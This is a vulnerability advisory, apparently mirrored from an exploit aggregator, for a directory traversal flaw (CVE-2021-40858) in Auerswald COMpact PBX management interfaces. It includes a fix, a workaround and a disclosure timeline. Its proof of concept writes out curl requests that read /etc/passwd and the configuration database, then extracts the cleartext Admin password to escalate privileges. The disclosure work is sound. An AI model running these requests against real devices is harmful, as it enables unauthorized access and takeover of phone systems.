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## https://sploitus.com/exploit?id=PACKETSTORM:165166
Advisory: Auerswald COMpact Arbitrary File Disclosure  
  
  
RedTeam Pentesting discovered a vulnerability in the web-based  
management interface of the Auerswald COMpact 5500R PBX which allows  
users with the "sub-admin" privilege to access any files on the PBX's  
file system.  
  
  
Details  
=======  
  
Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")  
Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))  
Fixed Versions: 8.2B  
Vulnerability Type: Arbitrary File Disclosure  
Security Risk: medium  
Vendor URL: https://www.auerswald.de/en/product/compact-5500r  
Vendor Status: fixed version released  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006  
Advisory Status: published  
CVE: CVE-2021-40858  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858  
  
  
Introduction  
============  
  
"Fully modular VoIP appliance for more efficient communication processes  
With the COMpact 5500R, you are originally equipped for everyday  
business - now and in the future.  
  
The fully modular architecture with 80 IP channels and all the functions  
of a large ITC server allows up to 112 subscribers and thus scales with  
your company.  
  
Continuous maintanance and expansion of the system software makes this  
versatile IP server a future-proof investment in any business  
communication."  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
RedTeam Pentesting discovered that attackers with administrative access  
to the PBX's web-based management interface (as a so-called "sub-admin")  
can download arbitrary files from the PBX's file system. This includes  
the usually not accessible configuration database which contains the  
password for the highly privileged "Admin" user in clear text.  
  
  
Proof of Concept  
================  
  
The command-line HTTP client curl[1] can be used to log into the  
management interface of the PBX with the username "sub-admin" and the  
password "verysecretpassword" as follows:  
  
------------------------------------------------------------------------  
$ curl --anyauth --user sub-admin:verysecretpassword --include \  
https://192.168.1.2/tree  
  
[...]  
HTTP/1.1 200 OK  
Content-Type: application/json; charset=utf-8;  
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/  
[...]  
  
[{"login":2,"userId":2222,[...]}]  
------------------------------------------------------------------------  
  
The server returns a session ID in a cookie which is then used to check  
the access level:  
  
------------------------------------------------------------------------  
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \  
https://192.168.1.2/logstatus_state  
  
HTTP/1.1 200 OK  
Content-Type: application/json; charset=utf-8;  
[...]  
  
{"logstatus":"Sub-Administrator"}  
------------------------------------------------------------------------  
  
In the PBX's user management, the access level "Sub-Administrator" is  
used for user accounts who should be able to configure the PBX. There  
are also other, higher-level access privileges.  
  
Users with the "sub-admin" privilege can configure music on hold (MOH,  
"Wartemusik"), and for example listen to the currently configured music.  
In order to do this, the browser requests the music files from the PBX.  
  
The file "alarm1.wav" can be accessed with curl as follows:  
  
------------------------------------------------------------------------  
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \  
'https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav'\  
'&pageindex=1'  
  
HTTP/1.1 200 OK  
Content-Type: audio/x-wav; charset=  
Content-Length: 132192  
Content-disposition: attachment; filename="alarm1.wav"  
[...]  
------------------------------------------------------------------------  
  
It was found that the PBX allows directory traversal with the string  
"../", so the file "/etc/passwd" can be accessed as follows:  
  
------------------------------------------------------------------------  
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \  
'https://192.168.1.2/wartemusik_verwaltung_play?'\  
'fileName=../../etc/passwd&pageindex='  
  
HTTP/1.1 200 OK  
[...]  
Content-Length: 113  
Content-disposition: attachment; filename="../../etc/passwd"  
[...]  
  
root::0:0:root:/root:/bin/sh  
netstorage::1:1::/data/ftpd:/bin/false  
web::2:2::/opt/auerswald/lighttpd:/bin/false  
------------------------------------------------------------------------  
  
The same issue is present in the function for managing logos. A regular  
request for the file "logo1.jpg" is shown below:  
  
------------------------------------------------------------------------  
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \  
'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424'  
  
HTTP/1.1 200 OK  
X-XSS-Protection: 1  
Content-Type: image/jpg; charset=UTF-8  
Content-Length: 13986  
Content-disposition: attachment; filename="logo1.jpg"  
[...]  
------------------------------------------------------------------------  
  
In a similar fashion as before, the file "/etc/passwd" can be accessed:  
  
------------------------------------------------------------------------  
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \  
'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd'  
  
HTTP/1.1 200 OK  
[...]  
  
root::0:0:root:/root:/bin/sh  
netstorage::1:1::/data/ftpd:/bin/false  
web::2:2::/opt/auerswald/lighttpd:/bin/false  
------------------------------------------------------------------------  
  
For attackers, an interesting file is the SQLite[2] database file  
"/data/db/pbx4.db". It can be downloaded as follows:  
  
------------------------------------------------------------------------  
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\  
'192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \  
> pbx4.db  
  
% Total % Received % Xferd Average Speed Time Time Time Current  
Dload Upload Total Spent Left Speed  
100 5120 100 5120 0 0 16253 0 --:--:-- --:--:-- --:--:-- 16305  
------------------------------------------------------------------------  
  
This file contains the password for the highly privileged "Admin" user  
account:  
  
------------------------------------------------------------------------  
$ sqlite3 pbx4.db  
SQLite version 3.27.2 2019-02-25 16:06:06  
Enter ".help" for usage hints.  
  
sqlite> .tables  
DbFileVersion PbxMisc  
  
sqlite> select * from PbxMisc;  
[...]  
AdminPasswdHash|  
AdminLogin|Admin  
AdminPin|43214321  
AdminPasswd|S3kr1t!  
------------------------------------------------------------------------  
  
The username and password can then be used to log into the web  
application:  
  
------------------------------------------------------------------------  
$ curl --user 'Admin:S3kr1t!' --anyauth --include \  
https://192.168.1.2/tree  
  
HTTP/1.1 200 OK  
Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/  
[...]  
  
[{"login":3,"userId":0,"userName":"",[...]}]  
------------------------------------------------------------------------  
  
Checking the access level reveals the new privilege:  
  
------------------------------------------------------------------------  
$ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \  
https://192.168.1.2/logstatus_state  
  
HTTP/1.1 200 OK  
Content-Type: application/json; charset=utf-8;  
[...]  
  
{"logstatus":"Administrator"}  
------------------------------------------------------------------------  
  
The user "Admin", in contrast to regular administrative users  
("sub-admin"), can access more functions and for example apply firmware  
updates.  
  
Workaround  
==========  
  
Disable or restrict access to the web-based management if possible.  
  
  
Fix  
===  
  
Upgrade to a firmware version which corrects this vulnerability.  
  
  
Security Risk  
=============  
  
Attackers who already have acquired administrative access as a so-called  
"sub-admin" can download a database file and access the password for the  
highly privileged "Admin" account. This account can use more functions and  
is allowed to apply firmware updates.  
  
On the one hand, exploiting this vulnerability already requires  
administrative access. On the other hand, attackers can reach  
high-privileged access to the PBX and use functions not available to  
"sub-admin" users, like firmware updates. All in all, this vulnerability  
is therefore rated to have a medium risk potential.  
  
  
Timeline  
========  
  
2021-08-26 Vulnerability identified  
2021-09-01 Customer approved disclosure to vendor  
2021-09-10 Vendor notified  
2021-09-10 CVE ID requested  
2021-09-10 CVE ID assigned  
2021-10-05 Vendor provides access to device with fixed firmware  
2021-10-11 Vendor provides fixed firmware  
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected  
2021-12-06 Advisory published  
  
  
References  
==========  
  
[1] https://curl.se  
[2] https://www.sqlite.org  
  
  
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